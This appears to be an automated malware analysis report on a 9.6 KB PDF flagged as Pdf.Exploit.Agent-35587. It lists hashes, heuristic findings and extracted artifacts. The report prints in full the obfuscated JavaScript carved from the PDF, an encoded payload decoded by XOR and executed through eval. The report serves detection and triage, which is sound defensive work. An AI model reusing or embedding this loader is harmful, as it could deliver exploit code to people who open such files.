Malicious PDF — malware analysis report

Static analysis result for SHA-256 febb1ca712ee1638…

MALICIOUS

PDF

9.6 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-06-28
MD5: a5e96cc453f179998c205b7f71416775 SHA-1: 3060abfd7ee552124583cd36be7b9edd0ce6d73d SHA-256: febb1ca712ee16388eba3ebc9438d2f6a62552c17d29c8b524a0aaafa1f461b2
286 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • ClamAV: Pdf.Exploit.Agent-35587 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35587
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function yMdCMw4e7ihbBL() {var datf = 'SYN0Dqel'+'j0mCf'+'DStDgJjS1JDtgDlSOSeD'+'t72Cx8dSY7lteVljn03SK'+'VlVDS'+'3KHn@'+'rVmjZBVOAu'+'XkS'+'HDmduVt8DUb'+'S'+'JWDKE7'+'S'+'RgVDCcP'+'CB7Pj2'+'BoKG7v'+'3p7DmdE'+'0b'+'DuJSlBJ3PDmK'+'jJN@rV'+'mjZBVOAuXD@1JDfsS2szXm'+'L'+'gJjy1'+'WDfsS2s'+'zXmLgJjS1JDfsS2'+'szXmLgJjtlN'+'l'+'0eWlDs03lEv8'+'RH'+'DmduVt8DKkDx8dSmNmdgmetq'+'n@rVmjZBVOAubdS1WDegm3mBNS'+'O7VDL83Ov0N'+'tCxvDyqel30WDY0VmIs'+'0@BtU@s7beS1JD'+'bHW8'+'mq'+'K0blV8mv'+'J'+'D'+'8t0eSy7@8s0l5Bajdqn …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x5C8 6063 bytes
SHA-256: 2fa4196a22b93136267ac79eddacc7f03f251e623c68c9d1121feeafa59dcfee
Detection
ClamAV: Pdf.Exploit.Agent-35587
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). 133 of 229 identifiers look randomly generated (e.g. 'jxvDQ_WDCOVjq0l0DsVS0BKRb1aD61JD'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function yMdCMw4e7ihbBL() {var datf = 'SYN0Dqel'+'j0mCf'+'DStDgJjS1JDtgDlSOSeD'+'t72Cx8dSY7lteVljn03SK'+'VlVDS'+'3KHn@'+'rVmjZBVOAu'+'XkS'+'HDmduVt8DUb'+'S'+'JWDKE7'+'S'+'RgVDCcP'+'CB7Pj2'+'BoKG7v'+'3p7DmdE'+'0b'+'DuJSlBJ3PDmK'+'jJN@rV'+'mjZBVOAuXD@1JDfsS2szXm'+'L'+'gJjy1'+'WDfsS2s'+'zXmLgJjS1JDfsS2'+'szXmLgJjtlN'+'l'+'0eWlDs03lEv8'+'RH'+'DmduVt8DKkDx8dSmNmdgmetq'+'n@rVmjZBVOAubdS1WDegm3mBNS'+'O7VDL83Ov0N'+'tCxvDyqel30WDY0VmIs'+'0@BtU@s7beS1JD'+'bHW8'+'mq'+'K0blV8mv'+'J'+'D'+'8t0eSy7@8s0l5BajdqnASc'+'m3'+'peY0'+'3q'+'Nm'+'Cm'+'nYABK8dlU'+'YABK8dlUYABK8'+'dlUYA'+'ql'+'@'+'f0PYAeK8AmPYAD'+'lKWs'+'UYAEJ'+'8VsUYAEJ'+'8b'+'OU'+'YAgS@YlUYA'+'gS8dlUYAgSqvt'+'PYAgXdbcUYADS'+'@fe'+'PYADS@vD'+'PYAElqKYP'+'Y'+'ABS@dcPYAgS@fDPYADJKfD'+'P'+'YAgb8aDPYAsl@8yUYAB'+'l8veUYAsl@8yUYADU@f8'+'UYAg'+'S@blUY'+'AgS@f'+'0'+'PYAD'+'JKfDPYA0'+'PdblUYADU8hK'+'UYAgP'+'8atUYAqKKblUYAg'+'S@kOUYAgS@f'+'DPYAt'+'Pq8Y'+'UYA0Pdf0PYA8KKhKUYADUKkOUY'+'AqKKftUYAgS@kYPYAgS'+'@fDPYAtPq8YUYA'+'0Pd'+'f8UYAePqhKUYAtJ'+'8AY'+'P'+'YAqKKD'+'yPYA'+'gS@byPYAgS@fD'+'PYA'+'tP'+'q8'+'YUY'+'A'+'0PdfeUYAqJ8hKUYAql@DO'+'UYA'+'qK'+'KhYPYAgS@Y'+'mPYAgS@'+'fDPYA'+'t'+'Pq8YU'+'YA0Pdv'+'DPYA0U@hKUYAq'+'Uq5Y'+'U'+'YAq'+'KKAKUYAgS'+'@DxUYAg'+'S@fDPYAtPq8YUYA'+'tS'+'@v0P'+'YABbK8YPYAsUq'+'DlPYADlKkcUYAD'+'bKatPYA'+'gXdbYU'+'YAgS@fgPY'+'A0P8fDPYAsUq8YUYADJKW0PYAgS'+'qatPYAgP@'+'hcUYADJKVDUY'+'ADbKVtP'+'Y'+'AqK'+'KVsUYA'+'gS@8yUYAgS@fDPYAEKKVDPYADPK'+'isUYAsl@WqUYA8J'+'dbKUY'+'AgS@fDPYADlKfDPYAD'+'b'+'8atPYA0Uq8y'+'UY'+'A0l@8lPYADlKVDPYAeS'+'@atPYAtJ8hKUYA'+'gS@fDPYA'+'0S@f'+'D'+'PYA'+'tPq8yUYAE'+'UK'+'v0PYA'+'0'+'SKfBPYA0Pq8'+'yU'+'YA'+'qKKv8UYAgS@hcP'+'YAgS'+'@fDPYAtPqfe'+'P'+'YA0JdWDPYA0b8fDPYAeP'+'85OU'+'YA0JdhO'+'PYAgS'+'qaDPYAEUq5KUYAgS'+'@fDPYAsUq'+'k@UYADJ'+'KWDP'+'Y'+'A'+'gb8atPYAgP@hc'+'UY'+'ADJKVD'+'UYADbKVtPYAt'+'S@bKUYAgS@fDPYAEU'+'Kf'+'DPYA0b'+'KfE'+'UYAtP'+'q'+'feP'+'YABbq'+'W0PYA0bqYyUYAtJ8'+'VePY'+'AeS@5OPYA'+'0bqVDPYAtP'+'q'+'8yUYAEUKveUYA0SK'+'ft'+'PYA0Pq8yU'+'YAqKKv8'+'UYAgS@WePYA'+'gS@fDPYA'+'gS@hcUYAsU'+'qk@UYADJKWDPYAgbKa'+'tPYA'+'gX@h'+'cUYADJKVDUYADbK'+'V'+'tP'+'YADS@bKUYAgS@fDPY'+'AEUKfDPYA'+'DJKk'+'@UY'+'A'+'DS@atPYA'+'gP@hcU'+'Y'+'ADJKV'+'D'+'UYA'+'DbKVtPYAgS@bKUY'+'AgS'+'@'+'fDPYAtP@fDPYA0'+'X@VBU'+'YAqU@fePYAqU@fe'+'PYAqU@fePYAqU@fePYAqK88lPYA0PKf0PYADJKVePYAq'+'J@YcUYA0X@kHUYA'+'ql@k@UYADJ'+'KVtP'+'YADJKblUYA'+'gbK5mUYA0S8'+'8yUY'+'A0Pdfe'+'UYAsKq8yUYADJK'+'ieUYADP85mPYAg'+'bq5KUYA0PdklPYAsUd'+'8yUYAgbqW'+'DPYABbqkl'+'P'+'YAtSKDYU'+'YABl'+'8a'+'g'+'PYA0KqfePYABbqVsU'+'YAgX8kxUYAD'+'S'+'@AOUY'+'AtJ@igUY'+'AgbK5m'+'PYA0'+'U'+'8DcPYA'+'gbqf0UYAtS@kyPYAtU@b'+'yUYAtU'+'8iBUYAsUqVtUYA0PKbOPYAqJK8yUYA0PK8yUYAgb'+'qW0'+'PYAEUdYm'+'UYAg'+'b88yUYADJKaBUYADb8VgUY'+'Ael8fePYAgSq8'+'yUYAgbq8yUYA0P8DOPY'+'A0J@V0U'+'YAgS@'+'f8UYA'+'tlqbKU'+'YAtJ8kOUY'+'A'+'0Pqk@U'+'YAtb8VB'+'PYAtX8a0UYAg'+'S@atUY'+'A8JK8H'+'UYA8'+'J8'+'Ky'+'U'+'YA'+'0l@Y'+'OPYAD'+'K'+'8DYPYADUd8lPYADU@8cUYADUKKyUYA0U@Kl'+'UY'+'AD'+'UKKKUYADK8'+'8mUYADJ@8'+'YPYADK'+'8Dc'+'PYADJ@8Y'+'PYADJ@'+'DcPY'+'A0'+'l@KHUYADl@8HUYA8'+'JKKlUY'+'ADU8D'+'YPYAD'+'J@8yUYADU@8'+'xUYADKKDYPYADl@8cUYADUKK'+'lUYA8l'+'KKmU'+'Y'+'ADK88xUYA8K8'+'8cU'+'YADKq'+'DYPYAD'+'U8'+'8'+'YPYAD'+'Ud8yUYADKK8'+'c'+'PYA8J8DcPY'+'A8J88HU'+'Y'+'ADUdY'+'YPY'+'AeJ@8yU'+'YA'+'eJ8YOU'+'YA8K8DY'+'UY'+'ADKqK@UYAeJK'+'Yy'+'SD'+'jJ'+'JD8t0eSHWemB7SL8JD'+'6@v8hBJ8b@J8bJJD8t0eSlk3Y7PCiES'+'eiq'+'nASy7@'+'8'+'s0l5Bajd'+'7'+'v3'+'p7DmdEVDq@e8y@el'+'30WDC8'+'VK'+'Rq3l8@nASHWemB'+'7SL8JDM@v'+'b'+'NnDess'+'X'+'@w0W@'+'@@J'+'2YHUby@'+'el30WDf'+'sS2szXm'+'LgJjS'+'1JDA77mYe70bgVb0cnl5@Udbcnl5@Udbmnby@n@rVmjZBVOAuX'+'D6@8md0S@t8Jbfs'+'S2s'+'zXmLgJj'+'R@vSlBJ3PDmKjJJD'+'8t0eScXSpBWmG07ql0NtJE'+'JSS1J'+'DClm02soSvVN8f7SjYq'+'nkS@J2d'+'@J8b@J'+'8jUv2beVmjBkKy@emO0WDCYN0DqejAYU'+'OE'+'8mll'+'E'+'VRH8S@3'+'z'+'J8yNPK8c3CKDYmCE'+'k'+'CJDP0Q'+'cXSp'+'BWmG07ql0NtJEJSyNPK8'+'c3'+'CKDY'+'mCE'+'kCJDP'+'0@Jnb'+'SJWD8s0eEgS@7'+'0NKGv'+'3jAYUOE8mllEVRH'+'8S@3'+'zaD6@'+'n@'+'rVmjZBVOAuXD@@vmfDNS'+'8sW'+'OGBYd'+'S'+'1WD6'+'qemA7D0d'+'sD3tqvtH7V@7vD0v'+'B78I0'+'Wbj@82'+'SYN0Dqv'+'lA'+'y0jMsb@PgVD6@n0bqmk8s7mKg0e'+'ng0'+'e'+'YsD3t7vl'+'OealDs03lEnby@vlAy0jM'+'sb@PgVD6@vlAy0jM'+'sb'+'@'+'Pg0kD'+'g'+'VeRtD0pE8k4Bbk'+'l_eD0x8dSYN0Dqn0GV'+'0800NSC0VKS1JDtgDlSOSe'+'Dt7'+'2C'+'yNK27P3r8Xtp780'+'C'+'t'+'0eaBW'+'bbxvkdg'+'Jmsz7CJqomtlVS3'+'0NqdEn8juvlAy0jMsb@Pg'+'0kmE'+'70Dt'+'Xl'+'CmUb'+'jJJDjD'+'VDCH'+'n0GV0800NSC'+'0V'+'K'+'uq'+'UMS1UASHJ'+'DeYvDCHn0GV0800NSC0'+'V'+'KutUMS1UASOJDeYvD3_SSDm0ej'+'E00'+'dJ38'+'T'+'qvASm'+'UbSuWp'+'SOV'+'jq0l0D'+'s'+'VS0BKRk1'+'aDQ@n8'+'jxvDQ_WDCOVjq0l0DsVS0BKRb1aD61JD'+'K@eYe@n0GV'+'0800'+'NSC0VKutU'+'MSuJDkxvDQ_WDC'+'OVjq'+'0l0'+'DsV'+'S'+'0BKRb1'+'aDQ@8KjxvDyqvOUD3@D'+'ta'+'bjJJD8t0eSyPOJ03'+'SdeaC@vVS'+'bn'+'X'+'D6@nltgDemtVepEeDpc'+'W8mqK0pcW8'+'mqK00'+'x8dSK'+'WSj_7m'+'CyPOJ'+'03SdeaC@vVSbnS'+'kR'+'g03lBWSSuJD'+'dyUdAm'+'UbSyPOJ'+'03Sd'+'eaC@vV'+'Sbn'+'XD@1'+'JDigk@7VVlNEbS@EVexvJDd'+'E'+'7SY78'+'0O_V330Dtdn0epqnASlb3R_700780'+'O_V3peVlfz70j_7CtD'+'D3'+'CJYeA00SB@'+'eD0un'+'3Y80dSyPOJ03SdeaC@v'+'VSbnPpj'+'JJD'+'6q'+'npS@kCtBSt@e0@'+'2tURD'+'Enb'+'y1'; function RL2MDbhxdIo(tQOVE){ var tp = '63@2@57@60@1@36@32@15@43@5@0@0@0@0@0@0@54@40@39@53@47@23@8@17@22@4@26@42@9@48@14@50@13@33@49@61@0@10@31@30@29@46@16@0@0@0@0@7@0@28@45@34@41@59@24@35@37@25@52@44@58@62@11@12@56@55@20@19@51@6@27@21@18@38@3'; var A27aFcqYhuFt=0, tgbf9tQsbGGf=tQOVE.length, s2tKFV2D9K3TKS=1024, jhjcNLHWFiOqy, TqdYjynEz1, X3qdUhTC='', CZnN6=A27aFcqYhuFt, wUt6AQ=A27aFcqYhuFt, QyfmlulmG6p8j=A27aFcqYhuFt, tDVGJ64gB7ngz=Array(); tDVGJ64gB7ngz = eval("tp"+".s"+"pl"+"it"+"('@')"); for(eval('TqdYjynEz1=Ma'+'th.'+'ce'+'il(tgbf9tQsbGGf'+'/s2tKFV2D9K3TKS)');TqdYjynEz1>A27aFcqYhuFt;TqdYjynEz1--){ for(eval('jhjcNLHWFiOqy=M'+'ath'+'.m'+'in(tgbf9tQsbGGf,'+'s2tKFV2D9K3TKS)');jhjcNLHWFiOqy>A27aFcqYhuFt;jhjcNLHWFiOqy--,tgbf9tQsbGGf--){ eval('QyfmlulmG6p8j|'+'=(tDVGJ64gB7ngz['+'tQOVE.'+'cha'+'rCo'+'de'+'At(CZnN6+'+'+)-48])<'+'<wUt6AQ'); if(wUt6AQ){ eval('X3qdUhTC+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](157^'+'QyfmlulmG6p8j&'+'25'+'5)'); QyfmlulmG6p8j>>=8; wUt6AQ-=2; } else { wUt6AQ=6; } } } eval(X3qdUhTC); } RL2MDbhxdIo(datf);}

Open this report in the interactive analyzer, or submit your own file for analysis.